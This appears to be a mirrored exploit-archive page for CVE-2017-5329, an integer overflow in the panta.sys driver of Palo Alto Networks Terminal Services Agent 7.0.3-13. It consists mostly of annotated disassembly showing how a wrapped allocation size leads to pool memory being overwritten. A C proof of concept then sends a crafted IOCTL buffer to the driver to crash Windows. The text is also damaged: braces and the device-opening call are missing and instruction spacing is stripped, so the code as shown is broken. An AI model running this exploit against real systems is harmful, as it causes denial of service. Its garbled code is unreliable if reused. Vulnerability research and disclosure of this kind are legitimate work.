Palo Alto Networks Terminal Services Agent 7.0.3-13 – Integer Overflow

  • 作者: Parvez Anwar
    日期: 2017-01-26
  • 类别:
  • 来源:
  • /*
    Exploit Title- Palo Alto Networks Terminal Services Agent Integer Overflow
    Date - 26th January 2017
    Discovered by- Parvez Anwar (@parvezghh)
    Vendor Homepage-
    Tested Version - 7.0.3-13 
    Driver Version - - panta.sys
    Tested on OS - 32bit Windows 7 SP1 
    CVE ID - CVE-2017-5329
    Vendor fix url -
    Fixed Version- 7.0.7 and later 
    Fixed driver ver -
    .text:9A26F0BD loc_9A26F0BD: 
    .text:9A26F0BD mov ecx, DeviceObject 
    .text:9A26F0C3 mov dword ptr [ecx+1ACh], 0 
    .text:9A26F0CD mov edx, DeviceObject
    .text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
    .text:9A26F0D9 mov ecx, [eax+14h]; Takes size to allocate from our inputted buffer 0x04924925
    .text:9A26F0DC imulecx, 38h; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
    .text:9A26F0DF mov [ebp+NumberOfBytes], ecx; Copy ecx value 0x18 onto stack
    .text:9A26F0E2 push44415450h ; Tag (PTAD string used)
    .text:9A26F0E7 mov edx, [ebp+NumberOfBytes]; Copy size 0x18 to edx
    .text:9A26F0EA pushedx ; NumberOfBytes
    .text:9A26F0EB push0 ; PoolType
    .text:9A26F0ED callds:ExAllocatePoolWithTag; If returned null (eax) exits with error cleanly else takes crash path 
    .text:9A26F0F3 mov ecx, DeviceObject
    .text:9A26F0F9 mov [ecx+1B0h], eax
    .text:9A26F0FF mov edx, DeviceObject
    .text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
    .text:9A26F10C jnz short loc_9A26F13C; Exits with error cleanly if incorrect size value but not crashable value
    .text:9A26F13C loc_9A26F13C: 
    .text:9A26F13C mov ecx, [ebp+NumberOfBytes]
    .text:9A26F13F pushecx ; 0x18 our allocated pool memory
    .text:9A26F140 push0 ; int, sets allocated memory to 0x00
    .text:9A26F142 mov edx, DeviceObject
    .text:9A26F148 mov eax, [edx+1B0h]
    .text:9A26F14E pusheax ; Pointer to our allocated buffer
    .text:9A26F14F callmemset
    .text:9A26F154 add esp, 0Ch
    .text:9A26F157 mov [ebp+var_4], 0; Null out ebp-4
    .text:9A26F15E jmp short loc_9A26F169
    .text:9A26F160 loc_9A26F160: 
    .text:9A26F160 mov ecx, [ebp+var_4]
    .text:9A26F163 add ecx, 1; Increment counter
    .text:9A26F166 mov [ebp+var_4], ecx; Store counter value
    .text:9A26F169 loc_9A26F169: 
    .text:9A26F169 mov edx, DeviceObject 
    .text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
    .text:9A26F175 mov ecx, [ebp+var_4]; Loop counter number
    .text:9A26F178 cmp ecx, [eax+14h]; Compares our inputted buffer size 0x04924925. Here our
     ; size is not using the wrapped value so loops till BSOD
    .text:9A26F17B jnb short loc_9A26F19A
    .text:9A26F17D mov edx, [ebp+var_4]; Counter value
    .text:9A26F180 imuledx, 38h
    .text:9A26F183 mov eax, DeviceObject
    .text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
    .text:9A26F18E lea edx, [ecx+edx+30h]; pointer+size(0x38*edx)+0x30
    .text:9A26F192 pushedx
    .text:9A26F193 callsub_9A26C000; Starts overwriting other pool allocations !!!
    .text:9A26F198 jmp short loc_9A26F160
    .text:9A26C000 sub_9A26C000proc near 
    .text:9A26C000 arg_0 = dword ptr8
    .text:9A26C000 pushebp 
    .text:9A26C001 mov ebp, esp
    .text:9A26C003 mov eax, [ebp+arg_0]; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
    .text:9A26C006 mov ecx, [ebp+arg_0]; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
    .text:9A26C009 mov [eax+4], ecx; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
    .text:9A26C00C mov edx, [ebp+arg_0]; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
    .text:9A26C00F mov eax, [ebp+arg_0]; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
    .text:9A26C012 mov [edx], eax; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
    .text:9A26C014 pop ebp
    .text:9A26C015 retn4
    .text:9A26C015 sub_9A26C000endp
    #include <stdio.h>
    #include <windows.h>
    #define BUFSIZE 44
    int main(int argc, char *argv[]) 
    HANDLE hDevice;
    char devhandle[MAX_PATH];
    DWORDdwRetBytes = 0;
    unsigned charbuffer[BUFSIZE];
    memset(buffer, 0x41, BUFSIZE);
    printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);
    *(DWORD*)(buffer + 20) = 0x04924925;
    sprintf(devhandle, "\\\\.\\%s", "panta");
    if(hDevice == INVALID_HANDLE_VALUE)
    printf("\n[-] Failed to open device %s\n\n", devhandle);
    return -1;
    printf("\n[+] Open %s device successful", devhandle);
    printf("\n[~] Press any key to continue . . .");
    DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL); 
    return 0;